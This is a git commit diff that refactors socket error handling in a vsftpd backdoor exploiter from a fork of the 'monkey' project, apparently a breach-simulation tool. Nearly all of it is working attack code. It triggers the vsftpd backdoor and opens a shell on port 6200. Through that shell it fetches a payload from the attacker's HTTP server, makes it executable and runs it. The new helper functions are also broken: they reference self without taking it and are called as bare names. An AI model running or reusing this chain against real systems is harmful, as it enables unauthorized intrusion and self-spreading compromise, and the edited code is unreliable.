forked from p15670423/monkey
Update vsftpd.py
implemented 3 functions socket_connect, socket_send,socket_send_recv to handle the exception as advised.
This commit is contained in:
Dhayalan
parent
525e541156
commit
9e5292dc8e
|
|
@ -30,38 +30,73 @@ class VSFTPDExploiter(HostExploiter):
|
||||||
super(VSFTPDExploiter, self).__init__(host)
|
super(VSFTPDExploiter, self).__init__(host)
|
||||||
self.skip_exist = self._config.skip_exploit_if_file_exist
|
self.skip_exist = self._config.skip_exploit_if_file_exist
|
||||||
|
|
||||||
def exploit_host(self):
|
def socket_connect(s,ip_addr,port):
|
||||||
try:
|
try:
|
||||||
LOG.info('Attempting to trigger backdoor...')
|
s.connect((ip_addr,port))
|
||||||
ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
return True
|
||||||
ftp_socket.connect((self.host.ip_addr, FTP_PORT))
|
except socket.error as e:
|
||||||
ftp_socket.recv(128).decode('utf-8')
|
LOG.error('Failed to connect to %s' , self.host.ip_addr)
|
||||||
# Attempt to login to trigger backdoor
|
|
||||||
ftp_socket.send(USERNAME)
|
return False
|
||||||
ftp_socket.recv(128).decode('utf-8')
|
|
||||||
ftp_socket.send(PASSWORD)
|
def socket_send_recv(s,message):
|
||||||
ftp_socket.recv(128).decode('utf-8')
|
try:
|
||||||
ftp_socket.close()
|
s.send(message)
|
||||||
LOG.info('Triggered backdoor')
|
return s.recv(128).decode('utf-8')
|
||||||
|
|
||||||
except socket.error as e:
|
except socket.error as e:
|
||||||
LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
|
LOG.error('Failed to send payload to %s' , self.host.ip_addr)
|
||||||
|
|
||||||
|
return False
|
||||||
|
|
||||||
|
def socket_send(s,message):
|
||||||
try:
|
try:
|
||||||
|
s.send(message)
|
||||||
|
return True
|
||||||
|
|
||||||
|
except socket.error as e:
|
||||||
|
LOG.error('Failed to send payload to %s' , self.host.ip_addr)
|
||||||
|
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def exploit_host(self):
|
||||||
|
|
||||||
|
LOG.info('Attempting to trigger backdoor...')
|
||||||
|
ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
|
||||||
|
if socket_connect(ftp_socket,self.host.ip_addr, FTP_PORT):
|
||||||
|
ftp_socket.recv(128).decode('utf-8')
|
||||||
|
|
||||||
|
# Attempt to login to trigger backdoor
|
||||||
|
|
||||||
|
if socket_send_recv(ftp_socket,USERNAME):
|
||||||
|
if socket_send_recv(ftp_socket,PASSWORD):
|
||||||
|
ftp_socket.close()
|
||||||
|
LOG.info('Triggered backdoor')
|
||||||
|
else:
|
||||||
|
LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
|
||||||
|
return False
|
||||||
|
else:
|
||||||
|
LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
|
||||||
|
return False
|
||||||
|
|
||||||
LOG.info('Attempting to connect to backdoor...')
|
LOG.info('Attempting to connect to backdoor...')
|
||||||
backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
backdoor_socket.connect((self.host.ip_addr, 6200))
|
|
||||||
|
if socket_connect(backdoor_socket,self.host.ip_addr, 6200):
|
||||||
LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
|
LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
|
||||||
|
|
||||||
command = str.encode("uname -m" + '\n')
|
command = str.encode("uname -m" + '\n')
|
||||||
backdoor_socket.send(command)
|
|
||||||
response = backdoor_socket.recv(128).decode('utf-8')
|
response = socket_send_recv(backdoor_socket,command)
|
||||||
|
if response:
|
||||||
LOG.info('Response for uname -m: %s', response)
|
LOG.info('Response for uname -m: %s', response)
|
||||||
if '' != response.lower().strip():
|
if '' != response.lower().strip():
|
||||||
# command execution is successful
|
# command execution is successful
|
||||||
self.host.os['machine'] = response.lower().strip()
|
self.host.os['machine'] = response.lower().strip()
|
||||||
self.host.os['type'] = 'linux'
|
self.host.os['type'] = 'linux'
|
||||||
|
|
||||||
else :
|
else :
|
||||||
LOG.info("Failed to execute command uname -m on victim %r ",self.host)
|
LOG.info("Failed to execute command uname -m on victim %r ",self.host)
|
||||||
|
|
||||||
|
|
@ -73,8 +108,6 @@ class VSFTPDExploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
||||||
LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
|
|
||||||
|
|
||||||
# copy the monkey into the machine
|
# copy the monkey into the machine
|
||||||
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
|
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
|
||||||
dropper_target_path_linux = self._config.dropper_target_path_linux
|
dropper_target_path_linux = self._config.dropper_target_path_linux
|
||||||
|
|
@ -85,19 +118,29 @@ class VSFTPDExploiter(HostExploiter):
|
||||||
http_path, dropper_target_path_linux)
|
http_path, dropper_target_path_linux)
|
||||||
LOG.info("Download_command is %s",download_command)
|
LOG.info("Download_command is %s",download_command)
|
||||||
|
|
||||||
command = str.encode(str(download_command) + '\n')
|
download_command = str.encode(str(download_command) + '\n')
|
||||||
backdoor_socket.send(command)
|
|
||||||
|
if socket_send(backdoor_socket,download_command):
|
||||||
|
LOG.info('Monkey is now Downloaded ')
|
||||||
|
else:
|
||||||
|
LOG.error('Failed to download monkey at %s' , self.host.ip_addr)
|
||||||
|
return False
|
||||||
|
|
||||||
http_thread.join(DOWNLOAD_TIMEOUT)
|
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||||
http_thread.stop()
|
http_thread.stop()
|
||||||
|
|
||||||
# changeit to executable
|
# changeit to executable
|
||||||
|
|
||||||
execute_command = "/bin/chmod +x %s" % dropper_target_path_linux
|
Change_exec_permission = "/bin/chmod +x %s" % dropper_target_path_linux
|
||||||
LOG.info("Execute_command is %s",execute_command)
|
LOG.info("Change_exec_permission is %s",Change_exec_permission)
|
||||||
|
|
||||||
command = str.encode(str(execute_command) + '\n')
|
Change_exec_permission = str.encode(str(Change_exec_permission) + '\n')
|
||||||
|
|
||||||
backdoor_socket.send(command)
|
if socket_send(backdoor_socket,Change_exec_permission):
|
||||||
|
LOG.info('Monkey can now be executed ')
|
||||||
|
else:
|
||||||
|
LOG.error('Failed to make the monkey executable at %s' , self.host.ip_addr)
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
# run the monkey
|
# run the monkey
|
||||||
|
|
@ -105,17 +148,16 @@ class VSFTPDExploiter(HostExploiter):
|
||||||
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||||
cmdline += "&"
|
cmdline += "&"
|
||||||
|
|
||||||
command = str.encode(str(cmdline) + '\n')
|
run_monkey = str.encode(str(cmdline) + '\n')
|
||||||
backdoor_socket.send(command)
|
if socket_send(backdoor_socket,run_monkey):
|
||||||
|
|
||||||
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||||
self._config.dropper_target_path_linux, self.host, cmdline)
|
self._config.dropper_target_path_linux, self.host, cmdline)
|
||||||
|
else:
|
||||||
|
LOG.error('Monkey failed to run at %s' , self.host.ip_addr)
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
self._exploit_info['Vulnerability'] = {"Success":"True"}
|
self._exploit_info['Vulnerability'] = {"Success":"True"}
|
||||||
|
|
||||||
except socket.error as e:
|
|
||||||
LOG.error('Failed to connect to backdoor on %s:6200', self.host.ip_addr)
|
|
||||||
LOG.error('Error Connecting to backdoor. Error: %s' % e)
|
|
||||||
return False
|
|
||||||
|
|
||||||
return True
|
return True
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue